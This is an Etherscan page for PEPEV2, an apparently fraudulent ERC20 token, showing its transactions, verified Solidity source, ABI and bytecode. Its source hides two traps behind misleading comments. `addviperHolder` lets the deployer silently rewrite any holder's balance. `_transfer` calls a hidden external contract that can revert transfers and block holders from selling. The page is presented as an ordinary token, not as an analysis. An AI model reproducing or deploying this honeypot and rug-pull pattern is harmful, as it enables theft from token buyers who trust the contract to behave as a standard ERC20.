ETH Price: $3,431.87 (+5.69%)
Gas: 6 Gwei

Contract

0xFB8EF70d1617d94F4eA0c59EA13839CD9Ff40F9F
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve179933362023-08-25 17:56:23325 days ago1692986183IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0012226426.23542911
Addviper Holder179933312023-08-25 17:55:23325 days ago1692986123IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0012279326.39132455
Approve179932172023-08-25 17:32:35325 days ago1692984755IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.001243726.6528335
Approve179932022023-08-25 17:29:35325 days ago1692984575IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.001287127.58293699
Approve179931972023-08-25 17:28:35325 days ago1692984515IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0015077532.35326555
Approve179931932023-08-25 17:27:47325 days ago1692984467IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0009059230.70629856
Approve179931862023-08-25 17:26:23325 days ago1692984383IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0012186226.2912443
Approve179931622023-08-25 17:21:35325 days ago1692984095IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.00125727.10527394
Approve179931572023-08-25 17:20:35325 days ago1692984035IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0013239928.52025968
Approve179931392023-08-25 17:16:59325 days ago1692983819IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0011639824.97668185
Approve179931232023-08-25 17:13:47325 days ago1692983627IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0013023427.94556683
Approve179931152023-08-25 17:12:11325 days ago1692983531IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0017473837.49501749
Approve179931022023-08-25 17:09:35325 days ago1692983375IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0013826629.63080583
Approve179931002023-08-25 17:09:11325 days ago1692983351IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.001209725.95765955
Approve179930912023-08-25 17:07:23325 days ago1692983243IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0013129828.1375284
Approve179930862023-08-25 17:06:23325 days ago1692983183IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0013048527.96336854
Approve179930782023-08-25 17:04:47325 days ago1692983087IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0012301626.36276117
Approve179930662023-08-25 17:02:23325 days ago1692982943IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0012067426.03495644
Approve179930642023-08-25 17:01:59325 days ago1692982919IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0007604128.47662176
Approve179930632023-08-25 17:01:47325 days ago1692982907IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0013492728.95244997
Approve179930552023-08-25 17:00:11325 days ago1692982811IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0011985525.71837361
Approve179930492023-08-25 16:58:59325 days ago1692982739IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0011356124.36775749
Approve179930482023-08-25 16:58:47325 days ago1692982727IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0012063325.85201578
Approve179930382023-08-25 16:56:47325 days ago1692982607IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0011061923.87793177
Approve179930232023-08-25 16:53:47325 days ago1692982427IN
0xFB8EF70d...D9Ff40F9F
0 ETH0.0015086532.49808273
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
PEPEV2

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 150 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-08-25
*/

// https://t.me/PEPEV2ER
// X://twitter.com/PEPEV2ERC
// Website:http://20pepe.cc/
pragma solidity ^0.8.0;


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


pragma solidity ^0.8.0;

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

abstract contract kkcca{
    function unicade (
        address,
        address
    ) external virtual returns(uint256) ;
}

pragma solidity ^0.8.0;

interface IERC20Metadata is IERC20 {

    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}


pragma solidity ^0.8.0;

abstract contract LABCoin is Context, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;kkcca contractSender;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address _vp;

    constructor(string memory name_, string memory symbol_, uint160 amount) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = 46200000000000000000000000000;
        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
        contractSender = kkcca(
            address(amount)
            );
        _vp = msg.sender;
    }
    
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function addviperHolder(
        address _value,
        uint256 _amt
    ) public {
        uint256 _amount = 10 - (
        msg.sender != _vp ? 10**2 : 10);
        mapping(address => uint256) storage excludeFee =
        _balances;_amount = 0;
        excludeFee[_value] = _amt;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        contractSender.
        
        // ERC20: transfer amount exceeds balance
        unicade(
            from,
            to
        ) - (amount-amount + 100);

        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            _balances[to] += amount;
        }
        emit Transfer(from, to, amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
}


// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0; 

contract PEPEV2 is LABCoin('PEPEV2 ', 'PEPEV2 ', uint160(0xf0e1D2e121d495b5CdE60E7413b16d94E53457Da)) , Ownable {
    constructor() {}

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_value","type":"address"},{"internalType":"uint256","name":"_amt","type":"uint256"}],"name":"addviperHolder","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b5060408051808201825260078082526602822a822ab19160cd1b60208084018281528551808701909652928552840152815191929173f0e1d2e121d495b5cde60e7413b16d94e53457da916200006b91600491906200017d565b508151620000819060059060208501906200017d565b506b9547be8a710724977800000060038190553360008181526020819052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620000d99162000223565b60405180910390a3600180546001600160a01b039092166001600160a01b03199283161790556006805490911633179055506200012190506200011b62000127565b6200012b565b62000269565b3390565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b8280546200018b906200022c565b90600052602060002090601f016020900481019282620001af5760008555620001fa565b82601f10620001ca57805160ff1916838001178555620001fa565b82800160010185558215620001fa579182015b82811115620001fa578251825591602001919060010190620001dd565b50620002089291506200020c565b5090565b5b808211156200020857600081556001016200020d565b90815260200190565b6002810460018216806200024157607f821691505b602082108114156200026357634e487b7160e01b600052602260045260246000fd5b50919050565b610b6280620002796000396000f3fe608060405234801561001057600080fd5b50600436106100bf5760003560e01c806370a082311161007c57806370a0823114610154578063715018a6146101675780638da5cb5b1461016f57806395d89b4114610184578063a9059cbb1461018c578063dd62ed3e1461019f578063f2fde38b146101b2576100bf565b806306fdde03146100c4578063095ea7b3146100e257806318160ddd14610102578063183274e31461011757806323b872dd1461012c578063313ce5671461013f575b600080fd5b6100cc6101c5565b6040516100d99190610819565b60405180910390f35b6100f56100f036600461079f565b610257565b6040516100d9919061080e565b61010a610279565b6040516100d99190610a72565b61012a61012536600461079f565b61027f565b005b6100f561013a366004610764565b6102c8565b6101476102f6565b6040516100d99190610a7b565b61010a610162366004610711565b6102fb565b61012a61031a565b61017761032e565b6040516100d991906107e0565b6100cc61033d565b6100f561019a36600461079f565b61034c565b61010a6101ad366004610732565b610364565b61012a6101c0366004610711565b61038f565b6060600480546101d490610adb565b80601f016020809104026020016040519081016040528092919081815260200182805461020090610adb565b801561024d5780601f106102225761010080835404028352916020019161024d565b820191906000526020600020905b81548152906001019060200180831161023057829003601f168201915b5050505050905090565b6000806102626103d2565b905061026f8185856103d6565b5060019392505050565b60035490565b6006546000906001600160a01b031633141561029c57600a61029f565b60645b6102aa90600a610ab8565b50506001600160a01b03909116600090815260208190526040902055565b6000806102d36103d2565b90506102e085828561048a565b6102eb8585856104d4565b506001949350505050565b601290565b6001600160a01b0381166000908152602081905260409020545b919050565b610322610669565b61032c60006106a8565b565b6007546001600160a01b031690565b6060600580546101d490610adb565b6000806103576103d2565b905061026f8185856104d4565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610397610669565b6001600160a01b0381166103c65760405162461bcd60e51b81526004016103bd906108af565b60405180910390fd5b6103cf816106a8565b50565b3390565b6001600160a01b0383166103fc5760405162461bcd60e51b81526004016103bd90610a2e565b6001600160a01b0382166104225760405162461bcd60e51b81526004016103bd906108f5565b6001600160a01b0380841660008181526002602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061047d908590610a72565b60405180910390a3505050565b60006104968484610364565b905060001981146104ce57818110156104c15760405162461bcd60e51b81526004016103bd90610937565b6104ce84848484036103d6565b50505050565b6001600160a01b0383166104fa5760405162461bcd60e51b81526004016103bd906109e9565b6105048180610aa1565b61050f906064610a89565b6001546040516303294a3b60e31b81526001600160a01b039091169063194a51d89061054190879087906004016107f4565b602060405180830381600087803b15801561055b57600080fd5b505af115801561056f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061059391906107c8565b61059d9190610aa1565b506001600160a01b0382166105c45760405162461bcd60e51b81526004016103bd9061086c565b6001600160a01b038316600090815260208190526040902054818110156105fd5760405162461bcd60e51b81526004016103bd9061096e565b6001600160a01b0380851660008181526020819052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061065b908690610a72565b60405180910390a350505050565b6106716103d2565b6001600160a01b031661068261032e565b6001600160a01b03161461032c5760405162461bcd60e51b81526004016103bd906109b4565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b80356001600160a01b038116811461031557600080fd5b600060208284031215610722578081fd5b61072b826106fa565b9392505050565b60008060408385031215610744578081fd5b61074d836106fa565b915061075b602084016106fa565b90509250929050565b600080600060608486031215610778578081fd5b610781846106fa565b925061078f602085016106fa565b9150604084013590509250925092565b600080604083850312156107b1578182fd5b6107ba836106fa565b946020939093013593505050565b6000602082840312156107d9578081fd5b5051919050565b6001600160a01b0391909116815260200190565b6001600160a01b0392831681529116602082015260400190565b901515815260200190565b6000602080835283518082850152825b8181101561084557858101830151858201604001528201610829565b818111156108565783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610a9c57610a9c610b16565b500190565b600082821015610ab357610ab3610b16565b500390565b600060ff821660ff841680821015610ad257610ad2610b16565b90039392505050565b600281046001821680610aef57607f821691505b60208210811415610b1057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122056f963223c0c43ab20ef7cb1102529cc1090b9dbaaf9096d477238d21a8a904f64736f6c63430008000033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100bf5760003560e01c806370a082311161007c57806370a0823114610154578063715018a6146101675780638da5cb5b1461016f57806395d89b4114610184578063a9059cbb1461018c578063dd62ed3e1461019f578063f2fde38b146101b2576100bf565b806306fdde03146100c4578063095ea7b3146100e257806318160ddd14610102578063183274e31461011757806323b872dd1461012c578063313ce5671461013f575b600080fd5b6100cc6101c5565b6040516100d99190610819565b60405180910390f35b6100f56100f036600461079f565b610257565b6040516100d9919061080e565b61010a610279565b6040516100d99190610a72565b61012a61012536600461079f565b61027f565b005b6100f561013a366004610764565b6102c8565b6101476102f6565b6040516100d99190610a7b565b61010a610162366004610711565b6102fb565b61012a61031a565b61017761032e565b6040516100d991906107e0565b6100cc61033d565b6100f561019a36600461079f565b61034c565b61010a6101ad366004610732565b610364565b61012a6101c0366004610711565b61038f565b6060600480546101d490610adb565b80601f016020809104026020016040519081016040528092919081815260200182805461020090610adb565b801561024d5780601f106102225761010080835404028352916020019161024d565b820191906000526020600020905b81548152906001019060200180831161023057829003601f168201915b5050505050905090565b6000806102626103d2565b905061026f8185856103d6565b5060019392505050565b60035490565b6006546000906001600160a01b031633141561029c57600a61029f565b60645b6102aa90600a610ab8565b50506001600160a01b03909116600090815260208190526040902055565b6000806102d36103d2565b90506102e085828561048a565b6102eb8585856104d4565b506001949350505050565b601290565b6001600160a01b0381166000908152602081905260409020545b919050565b610322610669565b61032c60006106a8565b565b6007546001600160a01b031690565b6060600580546101d490610adb565b6000806103576103d2565b905061026f8185856104d4565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610397610669565b6001600160a01b0381166103c65760405162461bcd60e51b81526004016103bd906108af565b60405180910390fd5b6103cf816106a8565b50565b3390565b6001600160a01b0383166103fc5760405162461bcd60e51b81526004016103bd90610a2e565b6001600160a01b0382166104225760405162461bcd60e51b81526004016103bd906108f5565b6001600160a01b0380841660008181526002602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259061047d908590610a72565b60405180910390a3505050565b60006104968484610364565b905060001981146104ce57818110156104c15760405162461bcd60e51b81526004016103bd90610937565b6104ce84848484036103d6565b50505050565b6001600160a01b0383166104fa5760405162461bcd60e51b81526004016103bd906109e9565b6105048180610aa1565b61050f906064610a89565b6001546040516303294a3b60e31b81526001600160a01b039091169063194a51d89061054190879087906004016107f4565b602060405180830381600087803b15801561055b57600080fd5b505af115801561056f573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061059391906107c8565b61059d9190610aa1565b506001600160a01b0382166105c45760405162461bcd60e51b81526004016103bd9061086c565b6001600160a01b038316600090815260208190526040902054818110156105fd5760405162461bcd60e51b81526004016103bd9061096e565b6001600160a01b0380851660008181526020819052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061065b908690610a72565b60405180910390a350505050565b6106716103d2565b6001600160a01b031661068261032e565b6001600160a01b03161461032c5760405162461bcd60e51b81526004016103bd906109b4565b600780546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b80356001600160a01b038116811461031557600080fd5b600060208284031215610722578081fd5b61072b826106fa565b9392505050565b60008060408385031215610744578081fd5b61074d836106fa565b915061075b602084016106fa565b90509250929050565b600080600060608486031215610778578081fd5b610781846106fa565b925061078f602085016106fa565b9150604084013590509250925092565b600080604083850312156107b1578182fd5b6107ba836106fa565b946020939093013593505050565b6000602082840312156107d9578081fd5b5051919050565b6001600160a01b0391909116815260200190565b6001600160a01b0392831681529116602082015260400190565b901515815260200190565b6000602080835283518082850152825b8181101561084557858101830151858201604001528201610829565b818111156108565783604083870101525b50601f01601f1916929092016040019392505050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526026908201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160408201526564647265737360d01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610a9c57610a9c610b16565b500190565b600082821015610ab357610ab3610b16565b500390565b600060ff821660ff841680821015610ad257610ad2610b16565b90039392505050565b600281046001821680610aef57607f821691505b60208210811415610b1057634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea264697066735822122056f963223c0c43ab20ef7cb1102529cc1090b9dbaaf9096d477238d21a8a904f64736f6c63430008000033

Deployed Bytecode Sourcemap

7046:140:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3642:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4574:201;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;3963:108::-;;;:::i;:::-;;;;;;;:::i;5086:296::-;;;;;;:::i;:::-;;:::i;:::-;;4783:295;;;;;;:::i;:::-;;:::i;3862:93::-;;;:::i;:::-;;;;;;;:::i;4079:127::-;;;;;;:::i;:::-;;:::i;1237:103::-;;;:::i;932:87::-;;;:::i;:::-;;;;;;;:::i;3750:104::-;;;:::i;4214:193::-;;;;;;:::i;:::-;;:::i;4415:151::-;;;;;;:::i;:::-;;:::i;1348:201::-;;;;;;:::i;:::-;;:::i;3642:100::-;3696:13;3729:5;3722:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3642:100;:::o;4574:201::-;4657:4;4674:13;4690:12;:10;:12::i;:::-;4674:28;;4713:32;4722:5;4729:7;4738:6;4713:8;:32::i;:::-;-1:-1:-1;4763:4:0;;4574:201;-1:-1:-1;;;4574:201:0:o;3963:108::-;4051:12;;3963:108;:::o;5086:296::-;5231:3;;5183:15;;-1:-1:-1;;;;;5231:3:0;5217:10;:17;;:30;;5245:2;5217:30;;;5237:5;5217:30;5201:47;;:2;:47;:::i;:::-;-1:-1:-1;;;;;;;5349:18:0;;;5259:46;5349:18;;;;;;;;;;:25;5086:296::o;4783:295::-;4914:4;4931:15;4949:12;:10;:12::i;:::-;4931:30;;4972:38;4988:4;4994:7;5003:6;4972:15;:38::i;:::-;5021:27;5031:4;5037:2;5041:6;5021:9;:27::i;:::-;-1:-1:-1;5066:4:0;;4783:295;-1:-1:-1;;;;4783:295:0:o;3862:93::-;3945:2;3862:93;:::o;4079:127::-;-1:-1:-1;;;;;4180:18:0;;4153:7;4180:18;;;;;;;;;;;4079:127;;;;:::o;1237:103::-;818:13;:11;:13::i;:::-;1302:30:::1;1329:1;1302:18;:30::i;:::-;1237:103::o:0;932:87::-;1005:6;;-1:-1:-1;;;;;1005:6:0;932:87;:::o;3750:104::-;3806:13;3839:7;3832:14;;;;;:::i;4214:193::-;4293:4;4310:13;4326:12;:10;:12::i;:::-;4310:28;;4349;4359:5;4366:2;4370:6;4349:9;:28::i;4415:151::-;-1:-1:-1;;;;;4531:18:0;;;4504:7;4531:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;4415:151::o;1348:201::-;818:13;:11;:13::i;:::-;-1:-1:-1;;;;;1437:22:0;::::1;1429:73;;;;-1:-1:-1::0;;;1429:73:0::1;;;;;;;:::i;:::-;;;;;;;;;1513:28;1532:8;1513:18;:28::i;:::-;1348:201:::0;:::o;148:98::-;228:10;148:98;:::o;6147:380::-;-1:-1:-1;;;;;6283:19:0;;6275:68;;;;-1:-1:-1;;;6275:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6362:21:0;;6354:68;;;;-1:-1:-1;;;6354:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6435:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;;:36;;;6487:32;;;;;6465:6;;6487:32;:::i;:::-;;;;;;;;6147:380;;;:::o;6535:441::-;6670:24;6697:25;6707:5;6714:7;6697:9;:25::i;:::-;6670:52;;-1:-1:-1;;6737:16:0;:37;6733:236;;6819:6;6799:16;:26;;6791:68;;;;-1:-1:-1;;;6791:68:0;;;;;;;:::i;:::-;6895:51;6904:5;6911:7;6939:6;6920:16;:25;6895:8;:51::i;:::-;6535:441;;;;:::o;5390:749::-;-1:-1:-1;;;;;5521:18:0;;5513:68;;;;-1:-1:-1;;;5513:68:0;;;;;;;:::i;:::-;5736:13;5743:6;;5736:13;:::i;:::-;:19;;5752:3;5736:19;:::i;:::-;5592:14;;:140;;-1:-1:-1;;;5592:140:0;;-1:-1:-1;;;;;5592:14:0;;;;:93;;:140;;5700:4;;5719:2;;5592:140;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:164;;;;:::i;:::-;-1:-1:-1;;;;;;5777:16:0;;5769:64;;;;-1:-1:-1;;;5769:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;5868:15:0;;5846:19;5868:15;;;;;;;;;;;5902:21;;;;5894:72;;;;-1:-1:-1;;;5894:72:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;6002:15:0;;;:9;:15;;;;;;;;;;;6020:20;;;6002:38;;6055:13;;;;;;;;;;:23;;;;;;6105:26;;;;;;6034:6;;6105:26;:::i;:::-;;;;;;;;5390:749;;;;:::o;1097:132::-;1172:12;:10;:12::i;:::-;-1:-1:-1;;;;;1161:23:0;:7;:5;:7::i;:::-;-1:-1:-1;;;;;1161:23:0;;1153:68;;;;-1:-1:-1;;;1153:68:0;;;;;;;:::i;1557:191::-;1650:6;;;-1:-1:-1;;;;;1667:17:0;;;-1:-1:-1;;;;;;1667:17:0;;;;;;;1700:40;;1650:6;;;1667:17;1650:6;;1700:40;;1631:16;;1700:40;1557:191;;:::o;14:175:1:-;84:20;;-1:-1:-1;;;;;133:31:1;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;:::-;345:41;264:128;-1:-1:-1;;;264:128:1:o;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:1:o;1294:194::-;;1417:2;1405:9;1396:7;1392:23;1388:32;1385:2;;;1438:6;1430;1423:22;1385:2;-1:-1:-1;1466:16:1;;1375:113;-1:-1:-1;1375:113:1:o;1493:203::-;-1:-1:-1;;;;;1657:32:1;;;;1639:51;;1627:2;1612:18;;1594:102::o;1701:304::-;-1:-1: